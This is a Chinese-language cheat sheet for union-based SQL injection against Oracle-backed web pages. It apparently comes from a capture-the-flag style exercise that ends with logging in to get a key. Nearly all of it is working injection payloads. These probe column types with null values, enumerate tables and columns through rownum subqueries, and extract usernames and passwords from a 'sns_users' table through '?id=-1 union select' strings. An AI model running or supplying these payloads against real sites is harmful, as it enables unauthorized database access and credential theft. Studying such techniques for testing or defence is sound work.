oracle,大型数据库,脚本语言一般是jsp,oracle对应端口1521
oracle自带虚拟表dual,oracle的查询语句必须完整的包含from字句,且每个字段的类型都要准确对应,一般使用null来判断类型
默认用户sys和system,最高权限是dba
0、系统语句
通过字段名找到对应表:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’;
查询第N行:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查询第9行(从1开始数)
当前用户:
SELECT user FROM dual;
列出所有用户:
SELECT username FROM all_users ORDER BY username;
列出数据库
SELECT DISTINCT owner FROM all_tables;
列出表名:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
列出字段名:
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;
定位DB文件:
SELECT name FROM V$DATAFILE;
1、order by 定字段
2、判断字符类型
and 1=2 union select null,null..... from dual 然后一个一个去判断字段类型,方法如下
and 1=2 union select 'null',null...... from dual 返回正常,说明第一个字段是字符型,反之为数字型
第一个字段是字符型时,判断第二个字段类型:
and 1=2 union select 'null','null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型
第一个字段是数字型时,判断第二个字段类型:
and 1=2 union select null,'null'...... from dual 返回正常,说明第二个字段是字符型,反之为数字型
判断第n个字段的类型,依次类推即可
两个字段都是字符型
3、判断回显位
4、准备工作
当前用户权限
and 1=2 union select null,(select sys_context('userenv','current_user')from dual) from dual
获取当前数据库名称
and 1=2 union select null,(select instance_name from V$INSTANCE) from dual
获取当前数据库版本
and 1=2 union select null,(select sys.v_$version where rownum=1) from dual
rownum:每次只能显示一条数据
5、爆表
爆当前数据库中的第一个表:
and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual
爆当前数据库中的第二个表:
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name not in ('第一个表')) from dual
以此类推去爆第n个表
我们需要的是用户的账号密码,因此直接查找存在users字样的表名
and 1=2 union select (select table_name from all_tables where rownum=1 and table_name like '%user%'),'2'from dual
6、从表中获取列名
爆某表中的第一个字段:
and 1=2 union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='表名') from dual
爆某表中的第二个字段:
and 1=2 union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='表名' and column_name not in ('第一个字段')) from dual
爆其它字段以此类推
?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name = 'sns_users'),'2'from dual
?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'2'from dual
7、获取数据
?id=-1 union select user_name,user_pwd from "sns_users"
得到用户名密码不正确
?id=-1 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'
得到第二组用户名和密码
登陆后拿到key